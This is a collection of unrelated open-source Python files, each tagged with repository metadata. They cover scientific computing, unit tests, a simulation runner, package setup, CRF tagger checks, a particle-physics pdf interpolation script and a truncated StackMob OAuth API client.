__copyright__ = "Copyright 2013-2014, http://radical.rutgers.edu"
__license__ = "MIT"
# ------------------------------------------------------------------------------
# Scheduler name constant
from types import *
from states import *
from logentry import *
from scheduler import *
# ------------------------------------------------------------------------------
#
from url import Url
from exceptions import *
from session import Session
from context import Context
from unit_manager import UnitManager
from compute_unit import ComputeUnit
from compute_unit_description import ComputeUnitDescription
from pilot_manager import PilotManager
from compute_pilot import ComputePilot
from compute_pilot_description import ComputePilotDescription
from resource_config import ResourceConfig
from staging_directives import COPY, LINK, MOVE, TRANSFER, SKIP_FAILED, CREATE_PARENTS
# ------------------------------------------------------------------------------
#
from utils.logger import logger
import os
import radical.utils as ru
import radical.utils.logger as rul
pwd = os.path.dirname (__file__)
root = "%s/.." % pwd
version, version_detail, version_branch, sdist_name, sdist_path = ru.get_version ([root, pwd])
# FIXME: the logger init will require a 'classical' ini based config, which is
# different from the json based config we use now. May need updating once the
# radical configuration system has changed to json
_logger = rul.logger.getLogger ('radical.pilot')
_logger.info ('radical.pilot version: %s' % version_detail)
# ------------------------------------------------------------------------------
| JensTimmerman/radical.pilot | src/radical/pilot/__init__.py | Python | mit | 1,882 | 0.020723 |
# -*- coding: utf-8 -*-
import unittest
from unittest.mock import patch
from hypothesis import given
from hypothesis.strategies import integers
from pokebase import APIResource, loaders
from pokebase.common import ENDPOINTS
def builder(func, func_name):
@given(id_=integers(min_value=1))
@patch('pokebase.interface.get_data')
def test(self, mock_get_data, id_):
mock_get_data.side_effect = [{'count': 1, 'results': [{'url': 'mocked.url/api/v2/{}/{}/'.format(func_name, id_)}]},
{'simple_attr': 10, 'list_attr': [{'name': 'mocked name'}], 'complex_attr': {'url': 'mocked.url/api/v2/{}/{}/'.format(func_name, 10)}},
{'count': 1, 'results': [{'url': 'mocked.url/api/v2/{}/{}/'.format(func_name, id_)}]}]
self.assertIsInstance(func(id_), APIResource)
return test
class TestFunctions_loaders(unittest.TestCase):
@classmethod
def setUpClass(cls):
for endpoint in ENDPOINTS:
if endpoint in ['type']:
# special cases, need trailing underscore
func_name = ''.join([endpoint.replace('-', '_'), '_'])
else:
func_name = endpoint.replace('-', '_')
func = getattr(loaders, func_name)
setattr(cls, 'testLoader_{}'.format(func_name), builder(func, endpoint))
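# The testLoader_<endpoint> methods are attached by setUpClass(), so call it
# once at import time: test discovery collects methods before unittest would
# run setUpClass() on its own.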
TestFunctions_loaders.setUpClass()
| GregHilmes/pokebase | tests/test_module_loaders.py | Python | bsd-3-clause | 1,399 | 0.004289 |
from __future__ import print_function
import os
import sys
import importlib
import mxnet as mx
from dataset.iterator import DetRecordIter
from config.config import cfg
from evaluate.eval_metric import MApMetric, VOC07MApMetric
import logging
from symbol.symbol_factory import get_symbol
def evaluate_net(net, path_imgrec, num_classes, mean_pixels, data_shape,
model_prefix, epoch, ctx=mx.cpu(), batch_size=1,
path_imglist="", nms_thresh=0.45, force_nms=False,
ovp_thresh=0.5, use_difficult=False, class_names=None,
voc07_metric=False, frequent=20):
"""
    Evaluate network given validation record file
Parameters:
----------
net : str or None
Network name or use None to load from json without modifying
path_imgrec : str
path to the record validation file
path_imglist : str
path to the list file to replace labels in record file, optional
num_classes : int
number of classes, not including background
mean_pixels : tuple
(mean_r, mean_g, mean_b)
data_shape : tuple or int
(3, height, width) or height/width
model_prefix : str
model prefix of saved checkpoint
epoch : int
load model epoch
ctx : mx.ctx
mx.gpu() or mx.cpu()
batch_size : int
validation batch size
nms_thresh : float
non-maximum suppression threshold
force_nms : boolean
whether suppress different class objects
ovp_thresh : float
        AP overlap threshold for true/false positives
use_difficult : boolean
whether to use difficult objects in evaluation if applicable
class_names : comma separated str
class names in string, must correspond to num_classes if set
voc07_metric : boolean
        whether to use 11-point evaluation as in VOC07 competition
frequent : int
frequency to print out validation status
"""
# set up logger
logging.basicConfig()
logger = logging.getLogger()
logger.setLevel(logging.INFO)
# args
if isinstance(data_shape, int):
data_shape = (3, data_shape, data_shape)
assert len(data_shape) == 3 and data_shape[0] == 3
#model_prefix += '_' + str(data_shape[1])
# iterator
eval_iter = DetRecordIter(path_imgrec, batch_size, data_shape,
path_imglist=path_imglist, **cfg.valid)
# model params
load_net, args, auxs = mx.model.load_checkpoint(model_prefix, epoch)
# network
if net is None:
net = load_net
else:
net = get_symbol(net, data_shape[1], num_classes=num_classes,
nms_thresh=nms_thresh, force_suppress=force_nms)
    if 'label' not in net.list_arguments():
label = mx.sym.Variable(name='label')
net = mx.sym.Group([net, label])
# init module
mod = mx.mod.Module(net, label_names=('label',), logger=logger, context=ctx,
fixed_param_names=net.list_arguments())
mod.bind(data_shapes=eval_iter.provide_data, label_shapes=eval_iter.provide_label)
mod.set_params(args, auxs, allow_missing=False, force_init=True)
# run evaluation
if voc07_metric:
metric = VOC07MApMetric(ovp_thresh, use_difficult, class_names,
roc_output_path=os.path.join(os.path.dirname(model_prefix), 'roc'))
else:
metric = MApMetric(ovp_thresh, use_difficult, class_names,
roc_output_path=os.path.join(os.path.dirname(model_prefix), 'roc'))
results = mod.score(eval_iter, metric, num_batch=None,
batch_end_callback=mx.callback.Speedometer(batch_size,
frequent=frequent,
auto_reset=False))
for k, v in results:
print("{}: {}".format(k, v))
| zhreshold/mxnet-ssd | evaluate/evaluate_net.py | Python | mit | 3,901 | 0.003076 |
import sys, os, multiprocessing, subprocess, time
src = os.path.abspath(os.path.join(os.path.dirname(__file__), 'src', 'sakia'))
res = os.path.abspath(os.path.join(os.path.dirname(__file__), 'res'))
pro_file_template = """
FORMS = {0}
SOURCES = {1}
TRANSLATIONS = {2}
"""
def generate_pro():
sources = []
forms = []
translations = []
project_filename = os.path.abspath(os.path.join(
os.path.dirname(__file__),
"sakia-ts-{0}".format(int(time.time()))))
for root, dirs, files in os.walk(src):
for f in files:
if f.endswith('.py') and not f.endswith('_uic.py'):
sources.append(os.path.join(root, f))
else:
continue
print(os.path.join(root, f))
for root, dirs, files in os.walk(res):
for f in files:
if f.endswith('.ui'):
forms.append(os.path.join(root, f))
elif f.endswith('.ts'):
translations.append(os.path.join(root, f))
else:
continue
print(os.path.join(root, f))
with open(project_filename, 'w') as outfile:
outfile.write(pro_file_template.format(""" \\
""".join(forms),
""" \\
""".join(sources),
""" \\
""".join(translations)))
return project_filename
pro_file = generate_pro()
try:
if "-noobsolete" in sys.argv:
print("Removing obsolete strings...")
subprocess.call(["pylupdate5", "-noobsolete", pro_file])
else:
subprocess.call(["pylupdate5", pro_file])
finally:
os.remove(pro_file)
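# Usage sketch (the temporary .pro project file is removed in the finally
# block above):
#
#   python update_ts.py              # update .ts files, keep obsolete strings
#   python update_ts.py -noobsolete  # also drop strings gone from the sources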
| ucoin-io/cutecoin | update_ts.py | Python | mit | 1,724 | 0.00174 |
from soba.models.continuousModel import ContinuousModel
import soba.visualization.ramen.mapGenerator as ramen
import soba.run
from collections import OrderedDict
import json
from time import time
import sys
from model import SEBAModel
from visualization.back import Visualization
import datetime as dt
aStar = False
strategies = ['nearest', 'safest', 'uncrowded']
# Simulation configuration
today = dt.date.today()
timeHazard = "10:30:00"
# Only two are necessary
families = [{'N': 4, 'child': 2, 'adult': 2}]
sebaConfiguration = {'families': [], 'hazard': timeHazard}
# Occupancy atributtes
jsonsOccupants = []
strategy = strategies[0]
N = 40
NDis = 0
fov = True
speed = 1.38
speedDis = 0.7
#states = OrderedDict([('Free time','out'), ('Rest', 'wp'), ('Lunch','out'), ('Work', 'wp')])
states = OrderedDict([('Free time','out'), ('Lunch','out'), ('Work', 'wp')])
schedule = {'t1': "09:00:00", 't2': "10:00:00", 't3': "11:00:00", 't4': "18:00:00"}
variation = {'t1': "00:50:00", 't2': "00:30:00", 't3': "00:30:00", 't4': "00:59:00"}
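# Assumed reading of the occupancy model below (inferred from how SOBA uses
# these dicts, not documented in this script): markovActivity holds
# state-transition weight matrices, one per period between the schedule marks
# t1..t4, whose columns line up with the entries of `states`; timeActivity
# gives the mean minutes spent in each state per period, with
# timeActivityVariation as its spread.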
markovActivity = {
'-t1': [[100, 0, 0], [100, 0, 0], [100, 0, 0], [100, 0, 0]],
't1-t2': [[0, 0, 70], [0, 0, 90], [0, 0, 80], [0, 0, 60]],
't2-t3': [[100, 0, 0], [0, 20, 60], [20, 50, 40], [0, 70, 30]],
't3-t4': [[100, 0, 0], [0, 20, 60], [0, 0, 70], [20, 0, 70]],
't4-': [[100, 0, 0], [70, 0, 30], [70, 0, 30], [70, 0, 30]]
}
timeActivity = {
'-t1': [3, 0, 0], 't1-t2': [0, 0, 45], 't2-t3': [0, 50, 45], 't3-t4': [0, 20, 45], 't4-': [3, 10, 20]
}
timeActivityVariation = {
'-t1': [0, 0, 0], 't1-t2': [0, 0, 10], 't2-t3': [0, 10, 10], 't3-t4': [0, 5, 10], 't4-': [0,5, 10]
}
jsonOccupant = {'type': 'regular' , 'astar': aStar, 'N': N, 'states': states , 'schedule': schedule, 'variation': variation,
'markovActivity': markovActivity, 'timeActivity': timeActivity, 'timeActivityVariation': timeActivityVariation,
'strategy': strategy, 'speedEmergency': speed, 'shape': 'rect', 'fov': fov}
jsonsOccupants.append(jsonOccupant)
jsonOccupantDis = {'type': 'dis' , 'astar': aStar, 'N': NDis, 'states': states , 'schedule': schedule, 'variation': variation,
'markovActivity': markovActivity, 'timeActivity': timeActivity, 'timeActivityVariation': timeActivityVariation,
'strategy': strategy, 'speedEmergency': speedDis, 'fov': fov}
jsonsOccupants.append(jsonOccupantDis)
#with open('auxiliarFiles/labgsi.blueprint3d') as data_file:
# jsonMap = ramen.returnMap(data_file, offsety = 9, offsetx = 0)
#cellW = 20
#cellH = 20
#with open('auxiliarFiles/uclm_furniture1_new.blueprint3d') as data_file:
#jsonMap = ramen.returnMap(data_file, offsety = 21, offsetx = 0)
#cellW = 113
#cellH = 80
with open('auxiliarFiles/uclm_furniture2_new.blueprint3d') as data_file:
jsonMap = ramen.returnMap(data_file, offsety = 21, offsetx = 0)
cellW = 113
cellH = 80
if len(sys.argv) > 1 and sys.argv[1] == '-v':
back = Visualization(cellW, cellH)
parameters = {'width': cellW, 'height': cellH, 'jsonMap': jsonMap, 'jsonsOccupants': jsonsOccupants, 'sebaConfiguration': sebaConfiguration}
soba.run.run(SEBAModel, parameters, visualJS="visualization/front.js", back=back)
else:
fixed_params = {"width": cellW, "height": cellH, "jsonMap": jsonMap, "jsonsOccupants": jsonsOccupants, 'sebaConfiguration': sebaConfiguration}
variable_params = {"seed": range(10, 500, 10)}
    soba.run.run(SEBAModel, fixed_params, variable_params)
| gsi-upm/soba | projects/seba/run.py | Python | mit | 3,404 | 0.016745 |
#!/usr/bin/env python
"""
Copyright (c) 2012, Aaron Meier
All rights reserved.
See LICENSE for more information.
"""
from distutils.core import setup
import os
from gitgate import __version__
setup(name='gitgate',
version = __version__,
description = 'Dead simple gatekeeping code review for Git',
long_description = (
"GitGate provides a GUI frontend (via Flask) for pre-merge code review."
),
author = 'Aaron Meier',
author_email = '[email protected]',
packages = ['gitgate'],
package_dir={'gitgate':'gitgate'},
package_data={'gitgate':['templates/*', 'static/bootstrap3/*/*', 'static/jquery/*.js']},
scripts=['gitgate/scripts/gitgate'],
url = 'http://gitgate.nullism.com',
install_requires = ['peewee>=2.2.3', 'flask>=0.9', 'argparse>=1'],
license = 'MIT',
provides = ['gitgate']
)
| webgovernor/gitgate | setup.py | Python | mit | 856 | 0.031542 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
from builtins import zip
import pycrfsuite
def compareTaggers(model1, model2, string_list, module_name):
"""
Compare two models. Given a list of strings, prints out tokens & tags
whenever the two taggers parse a string differently. This is for spot-checking models
:param tagger1: a .crfsuite filename
:param tagger2: another .crfsuite filename
:param string_list: a list of strings to be checked
:param module_name: name of a parser module
"""
module = __import__(module_name)
tagger1 = pycrfsuite.Tagger()
tagger1.open(module_name+'/'+model1)
tagger2 = pycrfsuite.Tagger()
tagger2.open(module_name+'/'+model2)
count_discrepancies = 0
for string in string_list:
tokens = module.tokenize(string)
if tokens:
features = module.tokens2features(tokens)
tags1 = tagger1.tag(features)
tags2 = tagger2.tag(features)
if tags1 != tags2:
count_discrepancies += 1
print('\n')
print("%s. %s" %(count_discrepancies, string))
print('-'*75)
print_spaced('token', model1, model2)
print('-'*75)
for token in zip(tokens, tags1, tags2):
print_spaced(token[0], token[1], token[2])
print("\n\n%s of %s strings were labeled differently"%(count_discrepancies, len(string_list)))
def print_spaced(s1, s2, s3):
n = 25
print(s1 + " "*(n-len(s1)) + s2 + " "*(n-len(s2)) + s3)
def validateTaggers(model1, model2, labeled_string_list, module_name):
module = __import__(module_name)
tagger1 = pycrfsuite.Tagger()
tagger1.open(module_name+'/'+model1)
tagger2 = pycrfsuite.Tagger()
tagger2.open(module_name+'/'+model2)
wrong_count_1 = 0
wrong_count_2 = 0
wrong_count_both = 0
correct_count = 0
for labeled_string in labeled_string_list:
unlabeled_string, components = labeled_string
tokens = module.tokenize(unlabeled_string)
if tokens:
features = module.tokens2features(tokens)
_, tags_true = list(zip(*components))
tags_true = list(tags_true)
tags1 = tagger1.tag(features)
tags2 = tagger2.tag(features)
if (tags1 != tags_true) and (tags2 != tags_true):
print("\nSTRING: ", unlabeled_string)
print("TRUE: ", tags_true)
print("*%s: "%model1, tags1)
print("*%s: "%model2, tags2)
wrong_count_both += 1
elif (tags1 != tags_true):
print("\nSTRING: ", unlabeled_string)
print("TRUE: ", tags_true)
print("*%s: "%model1, tags1)
print("%s: "%model2, tags2)
wrong_count_1 += 1
elif (tags2 != tags_true):
print("\nSTRING: ", unlabeled_string)
print("TRUE: ", tags_true)
print("%s: "%model1, tags1)
print("*%s: "%model2, tags2)
wrong_count_2 += 1
else:
correct_count += 1
print("\n\nBOTH WRONG: ", wrong_count_both)
print("%s WRONG: %s" %(model1, wrong_count_1))
print("%s WRONG: %s" %(model2, wrong_count_2))
print("BOTH CORRECT: ", correct_count)
| et-al-Health/parserator | parserator/spotcheck.py | Python | mit | 3,434 | 0.004659 |
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import os
import unittest
sys.path.insert(0, os.path.abspath('..'))
import dxpad._contest as _contest
class SignalMonitor:
signal_received = False
signal_value = None
def __init__(self, signal):
signal.connect(self.signal_receiver)
def signal_receiver(self, value = None):
self.signal_received = True
self.signal_value = value
class TestCurrentQso(unittest.TestCase):
def test_create(self):
qso = _contest.CurrentQso(_contest.Exchange())
def test_next_increases_serial(self):
qso = _contest.CurrentQso(_contest.Exchange())
qso.next()
self.assertEqual(qso.serial, 2)
def test_next_updates_exchange_out(self):
exchange = _contest.SerialExchange()
qso = _contest.CurrentQso(exchange)
qso.serial = 123
qso.next()
self.assertEqual(exchange.serial, 124)
def test_next_clears_inputs(self):
qso = _contest.CurrentQso(_contest.SerialExchange())
qso.call = "the call"
qso.exchange_in = "the exchange in"
qso.call_valid = True
qso.exchange_in_valid = True
qso.complete = True
qso.next()
self.assertEqual(qso.call, "")
self.assertEqual(qso.exchange_in, "")
self.assertFalse(qso.call_valid)
self.assertFalse(qso.exchange_in_valid)
self.assertFalse(qso.complete)
def test_next_emits_changed_invalid_and_incomplete(self):
qso = _contest.CurrentQso(_contest.SerialExchange())
qso.call_valid = True
qso.exchange_in_valid = True
qso.complete = True
monitor_changed = SignalMonitor(qso.changed)
monitor_call = SignalMonitor(qso.call_is_valid)
monitor_exchange_in = SignalMonitor(qso.exchange_in_is_valid)
monitor_complete = SignalMonitor(qso.completed)
qso.next()
self.assertTrue(monitor_changed.signal_received)
self.assertTrue(monitor_call.signal_received)
self.assertFalse(monitor_call.signal_value)
self.assertTrue(monitor_exchange_in.signal_received)
self.assertFalse(monitor_exchange_in.signal_value)
self.assertTrue(monitor_complete.signal_received)
self.assertFalse(monitor_complete.signal_value)
def test_set_call_valid_emits_call_is_valid(self):
qso = _contest.CurrentQso(_contest.Exchange())
monitor = SignalMonitor(qso.call_is_valid)
qso.set_call("N1")
self.assertFalse(monitor.signal_received)
qso.set_call("N1MM")
self.assertTrue(monitor.signal_received)
self.assertTrue(monitor.signal_value)
def test_set_exchange_in_valid_emits_exchange_in_is_valid(self):
qso = _contest.CurrentQso(_contest.Exchange())
monitor = SignalMonitor(qso.exchange_in_is_valid)
qso.set_exchange_in("1")
self.assertTrue(monitor.signal_received)
self.assertTrue(monitor.signal_value)
class TestSerialExchange(unittest.TestCase):
def test_str_padding_with_zeros(self):
exchange = _contest.SerialExchange()
self.assertEqual(str(exchange), "599001")
def test_str_padding_only_to_three_digits(self):
exchange = _contest.SerialExchange()
exchange.serial = 1000
self.assertEqual(str(exchange), "5991000")
def test_next_uses_serial_of_qso(self):
exchange = _contest.SerialExchange()
qso = _contest.CurrentQso(exchange)
qso.serial = 123
exchange.next(qso)
self.assertEqual(exchange.serial, 123)
def test_next_emits_changed(self):
exchange = _contest.SerialExchange()
monitor = SignalMonitor(exchange.changed)
exchange.next(_contest.CurrentQso(exchange))
self.assertTrue(monitor.signal_received)
| ftl/dxpad | tests/test_contest.py | Python | mit | 3,821 | 0.001309 |
#!/usr/bin/env python
# https://github.com/svenkreiss/PyROOTUtils/blob/master/PyROOTUtils/Graph.py
__author__ = "Kyle Cranmer <[email protected]"
__version__ = "0.1"
'''
This is a research work in progress.
Define model mu_s*Gaus(x|alpha,sigma)+mu_b*flat(x)
Generate {x} for several {alpha}
Calculate power (expected significance) for some alpha using profile likelihood approach
1) Train NN for alpha=0.
1a) make (histfactory/on the fly) model for NN with alpha variations
- calculate power
1b) make pdf on the fly for each value of alpha
2) Train NN with {x,alpha}
a) make histfactory model for NN with alpha variations using same alpha as input to NN
- calculate power
b) make pdf on the fly for NN with alpha variations using same alpha as input to NN
- calculate power
'''
import ROOT
import numpy as np
from sklearn import svm, linear_model, gaussian_process
from sklearn.neural_network import BernoulliRBM
from sklearn.ensemble import AdaBoostClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.externals import joblib
import matplotlib.pyplot as plt
import os.path
def createdPdfForFixed():
'''
Read in learner saved in fixed.pkl
Evaluate outputs for several parameter points.
Generate histograms for each point.
(to do: create parametrized pdf that interpolates across these pdfs)
'''
clf = joblib.load('fixed.pkl')
trainAndTarget = np.loadtxt('traindata.dat')
traindata = trainAndTarget[:,0:2]
targetdata = trainAndTarget[:,2]
    massPoints = np.unique(traindata[:,1])
    # `outputs`, `chunk` and `shift` are used below but were never defined in
    # this draft; the reconstruction here assumes the file is ordered as
    # [all signal rows | all background rows] with an equal number of rows per
    # (label, mass) pair, and that the learner's predict() output is the score
    # being histogrammed.
    outputs = clf.predict(traindata)
    shift = len(traindata) // 2
    chunk = shift // len(massPoints)
fixedhists=[]
c1 = ROOT.TCanvas()
for j, name in enumerate(['sig','bkg']):
for i, mass in enumerate(massPoints):
#bkg part
#plt.hist(outputs[i*chunk+shift: \
# (i+1)*chunk+shift], 30, alpha=0.3)
#sig part
hist = ROOT.TH1F('h{0}hist{1}'.format(name,i),"hist",30,-0.1,1.2)
fixedhists.append(hist)
for val in outputs[i*chunk+j*shift: (i+1)*chunk+j*shift]:
hist.Fill(val)
if i==0:
hist.Draw()
else:
hist.Draw('same')
c1.SaveAs('roothists.pdf')
def createPdfForAdaptive_tree(tree):
'''
Read in learner saved in adaptive.pkl
Evaluate outputs for several parameter points, using true value for parameter
Generate histograms for each point.
create parametrized pdf that interpolates across these pdfs
'''
bins=30
low=0.
high=1.
# loop over the tree, build histograms of output for target=(0,1), different mx values
i=0
var_points = [ [] , [] ]
adaptivehists = [ [] , [] ]
while (tree.GetEntry(i)):
# have we seen this mx before?
try:
# if so, get the index
ind = var_points[int(tree.target)].index(tree.mx)
except ValueError:
# if no, add to our list and make a histogram for it, then get the index
var_points[int(tree.target)].append(tree.mx)
ind = var_points[int(tree.target)].index(tree.mx)
hist = ROOT.TH1F('h{0}hist{1}'.format(int(tree.target),ind),"hist",bins,low,high)
adaptivehists[int(tree.target)].append(hist)
# if (i%1000==0):
# print ' entry ', i , ' mx = ', tree.mx, ' target = ', tree.target, ' ind = ',ind,var_points[0],var_points[1]
# fill the histogram
adaptivehists[int(tree.target)][ind].Fill(tree.MLP)
i=i+1
# sort them by the var_points
for target in 0,1:
var_points[target], adaptivehists[target] = zip(*sorted(zip(var_points[target],adaptivehists[target])))
print var_points
print adaptivehists
# build RooWorld stuff
w = ROOT.RooWorkspace('w')
w.factory('mx[{0},{1}]'.format( var_points[0][0],var_points[0][len(var_points[0])-1]))
w.factory('score[{0},{1}]'.format(low,high))
s = w.var('score')
mu = w.var('mx')
adpativedatahists=[[],[]]
adpativehistpdfs=[[],[]]
for target in 0,1:
for ind in range(0,len(var_points[target])):
print "Building RooWorld stuff for target",target," index ",ind
print " mx = ", var_points[target][ind], " mean = ", adaptivehists[target][ind].GetMean(), " rms = ", adaptivehists[target][ind].GetRMS()
datahist = ROOT.RooDataHist('dh{0}datahist{1}'.format(target,ind),"hist",
ROOT.RooArgList(s), adaptivehists[target][ind])
order=1
s.setBins(bins)
histpdf = ROOT.RooHistPdf('hp{0}histpdf{1}'.format(target,ind),"hist",
ROOT.RooArgSet(s), datahist,order)
histpdf.specialIntegratorConfig(ROOT.kTRUE).method1D().setLabel('RooBinIntegrator')
getattr(w,'import')(datahist) # work around for morph = w.import(morph)
getattr(w,'import')(histpdf) # work around for morph = w.import(morph)
adpativedatahists[target].append(datahist)
adpativehistpdfs[target].append(histpdf)
w = makeBSpline(w,mu,s,adpativehistpdfs[target], var_points[target], 'm{0}morph'.format(target))
morph = w.pdf('m{0}morph'.format(target))
morph.specialIntegratorConfig(ROOT.kTRUE).method1D().setLabel('RooBinIntegrator')
print morph
# make dataset, add to workspace
w.factory('mwwbb[500,7000]')
w.factory('mx[350,1600]')
w.factory('target[-1,2]')
w.defineSet('inputvars','mwwbb,mx')
w.defineSet('treevars','mwwbb,mx,target')
w.defineSet('obsvars','mwwbb')
alldata = ROOT.RooDataSet('alldata','',tree, w.set('treevars'))
alldata.Print()
toydata = alldata.reduce(ROOT.RooFit.Cut('mx==1000.'))
toydata.Print()
obsdata = toydata.reduce(ROOT.RooFit.SelectVars(w.set('obsvars')))
obsdata.Print()
obsdata = ROOT.RooDataSet('obsdata','',tree, w.set('obsvars'))
getattr(w,'import')(alldata)
getattr(w,'import')(obsdata)
w.Print()
w.writeToFile("workspace_adaptive_tree.root")
def createPdfForAdaptive():
f = ROOT.TFile("ttbar_14tev_jes1_eval.root")
nt = f.Get("nto")
createPdfForAdaptive_tree(nt)
def plotScore():
ROOT.gSystem.Load( 'TMVAWrapper/libTMVAWrapper' )
ROOT.gROOT.ProcessLine(".L RooBSplineBases.cxx+")
ROOT.gROOT.ProcessLine(".L RooBSpline.cxx+")
f = ROOT.TFile('workspace_adaptive_tree.root','r')
w = f.Get('w')
inputVars = ROOT.RooArgList(w.set('inputvars'))
inputVars.Print()
nn = ROOT.TMVAWrapper('nn','nn',inputVars,"TMVARegression_ttbar_14tev_jes1.root_MLP.weights.xml")
frame = w.var('mwwbb').frame()
for x in np.linspace(400,1600,20):
w.var('mx').setVal(x)
nn.plotOn(frame)
c1 = ROOT.TCanvas("c2",'',400,400)
frame.Draw()
c1.SaveAs('tmva.pdf')
frame = w.var('mx').frame()
w.var('mwwbb').setVal(800)
for x in np.linspace(400,1600,20):
w.var('mwwbb').setVal(x)
nn.plotOn(frame)
frame.Draw()
c1.SaveAs('tmva_vs_mx.pdf')
def plotAdaptive():
'''
make plots of the output of the parametrized model
'''
#import class code should work automatically, but confused by namespace
ROOT.gROOT.ProcessLine(".L RooBSplineBases.cxx+")
ROOT.gROOT.ProcessLine(".L RooBSpline.cxx+")
f = ROOT.TFile('workspace_adaptive_tree.root','r')
w = f.Get('w')
c1 = ROOT.TCanvas("c2",'',400,400)
frame = w.var('score').frame()
c1.SetLogy();
for val in np.linspace(400,1500,100):
w.var('mx').setVal(val)
w.pdf('m1morph').plotOn(frame,ROOT.RooFit.LineColor(ROOT.kRed))
w.pdf('m0morph').plotOn(frame,ROOT.RooFit.LineColor(ROOT.kBlue))
frame.Draw()
c1.SaveAs('root_bspline.pdf')
def fitAdaptive():
#ugh, tough b/c fixed data are the features, not the NN output
ROOT.gSystem.Load( 'TMVAWrapper/libTMVAWrapper' )
ROOT.gROOT.ProcessLine(".L RooBSplineBases.cxx+")
ROOT.gROOT.ProcessLine(".L RooBSpline.cxx+")
ROOT.gROOT.ProcessLine('.L CompositeFunctionPdf.cxx+')
f = ROOT.TFile('workspace_adaptive_tree.root','r')
w = f.Get('w')
w.Print()
w.factory('CompositeFunctionPdf::sigtemplate(fm0morphfunc)')
w.factory('CompositeFunctionPdf::bkgtemplate(fm1morphfunc)')
w.factory('Uniform::baseline(score)')
w.factory('SUM::template(sigfrac[0,1]*sigtemplate,const[0.01]*baseline,bkgtemplate)')
mu = w.var('mx')
mu.setVal(0)
c1 = ROOT.TCanvas('c1')
sframe = w.var('score').frame()
w.pdf('sigtemplate').plotOn(sframe)
w.pdf('m0morph').plotOn(sframe,ROOT.RooFit.LineColor(ROOT.kGreen))
w.pdf('m1morph').plotOn(sframe,ROOT.RooFit.LineColor(ROOT.kRed))
w.pdf('sigtemplate').plotOn(sframe,ROOT.RooFit.LineColor(ROOT.kGreen))
w.pdf('bkgtemplate').plotOn(sframe,ROOT.RooFit.LineColor(ROOT.kRed))
w.pdf('template').plotOn(sframe,ROOT.RooFit.LineColor(ROOT.kBlack))
w.pdf('template').plotOn(sframe,ROOT.RooFit.Components('sigtemplate'),ROOT.RooFit.LineColor(ROOT.kRed))
w.pdf('template').plotOn(sframe,ROOT.RooFit.Components('bkgtemplate'),ROOT.RooFit.LineColor(ROOT.kGreen))
sframe.Draw()
c1.SaveAs('template.pdf')
#create a dataset for
data = w.data('obsdata')
data.Print()
#need a RooAbsReal to evaluate NN(x,mu)
#nn = ROOT.TMVAWrapper('nn','nn',x,mu)
print "make RooArgSet"
print "create TMVAWrapper "
inputVars = ROOT.RooArgList(w.set('inputvars'))
inputVars.Print()
nn = ROOT.TMVAWrapper('nn','nn',inputVars,"TMVARegression_ttbar_14tev_jes1.root_MLP.weights.xml")
#weightfile = "TMVARegression_alphavary.root_MLP.weights.xml"
print "about to import"
print "get val = ", nn.getVal()
getattr(w,'import')(ROOT.RooArgSet(nn),ROOT.RooFit.RecycleConflictNodes())
w.Print()
print "ok, almost done"
#create nll based on pdf(NN(x,mu) | mu)
w.factory('EDIT::pdf(template,score=nn)')
#w.factory('EDIT::pdf(pdftemp,mu=mx)')
#resetting mu->mux dies.
#w.factory('EDIT::pdf(template,score=nn,mu=mx)')
#wory that DataHist & HistPdf observable not being reset
pdf = w.pdf('pdf')
print 'pdf has expected events = ', pdf.expectedEvents(ROOT.RooArgSet(nn))
w.Print()
pdf.graphVizTree('pdf2bTMVA.dot')
mu = w.var('mx')
mu.setConstant(False)
mu.Print()
#construct likelihood and plot it
nll = pdf.createNLL(data)
#nll = pdf.createNLL(data,ROOT.RooFit.Extended(False))
#restrict NLL to relevant region in mu
#frame=mu.frame(-.7,.7)
frame=mu.frame()
nll.plotOn(frame, ROOT.RooFit.ShiftToZero())
frame.SetMinimum(0)
frame.SetMaximum(10)
frame.Draw()
c1.SaveAs('fitAdaptiveTMVA.pdf')
pdf.fitTo(data,ROOT.RooFit.Extended(False))
return
def makeBSpline(w,interpParam, observable, pdfList, paramPoints,name='morph',):
'''
The helper function to create the parametrized model that interpolates
across input pdfs
'''
ROOT.gROOT.ProcessLine(".L RooBSplineBases.cxx+")
ROOT.gROOT.ProcessLine(".L RooBSpline.cxx+")
paramVec = ROOT.TVectorD(len(paramPoints))
tValues = ROOT.std.vector("double")()
for i, p in enumerate(paramPoints):
paramVec[i]=p #seems silly, but other constructor gave problems
tValues.push_back(p)
order=3
bspb = ROOT.RooStats.HistFactory.RooBSplineBases( "bases", "bases", order, tValues, interpParam )
pdfs = ROOT.RooArgList()
for pdf in pdfList:
pdfs.add(pdf)
#this makes a function
morphfunc = ROOT.RooStats.HistFactory.RooBSpline( 'f'+name+'func', "morphfunc", pdfs, bspb, ROOT.RooArgSet() )
#if you want to convert it into a PDF
morph = ROOT.RooRealSumPdf(name,name, ROOT.RooArgList(morphfunc), ROOT.RooArgList())
print morph
#getattr(w,'import')(morph) # work around for morph = w.import(morph)
getattr(w,'import')(ROOT.RooArgSet(morph),ROOT.RooFit.RecycleConflictNodes()) # work around for morph = w.import(morph)
w.importClassCode()
return w
if __name__ == '__main__':
'''
The main function that calls the individual steps of the procedure
'''
plotScore()
#createPdfForAdaptive()
#plotAdaptive()
#fitAdaptive()
| cranmer/parametrized-learning | ttbar_resonance.py | Python | bsd-2-clause | 11,616 | 0.037965 |
import oauth.oauth as oauth
import httplib
import json
import sys
class BaseClient:
def __init__(self, baseURL, key, secret):
self.url = baseURL
self.connection = httplib.HTTPConnection(baseURL)
self.consumer = oauth.OAuthConsumer(key, secret)
def _execute(self, httpmethod, path, body):
request = oauth.OAuthRequest.from_consumer_and_token(self.consumer, http_method=httpmethod, http_url="http://" + self.url + "/" + path)
request.sign_request(oauth.OAuthSignatureMethod_HMAC_SHA1(), self.consumer, None)
headers = request.to_header()
headers["Content-Type"] = "application/json"
headers["Accept"] = "application/vnd.stackmob+json; version=0"
self.connection.set_debuglevel(1)
bodyString = ""
if(body != None):
bodyString = json.dumps(body)
self.connection.request(request.http_method, "/"+path, body=bodyString, headers=headers)
return self.connection.getresponse()
    def get(self, path):
        return self._execute("GET", path, None)
    def post(self, path, body):
        return self._execute("POST", path, body)
    def put(self, path, body):
        return self._execute("PUT", path, body)
    def delete(self, path):
        return self._execute("DELETE", path, None)
class APIClient(BaseClient):
    def __init__(self, key, secret):
        BaseClient.__init__(self, "api.mob1.stackmob.com", key, secret)
class PushAPIClient(BaseClient):
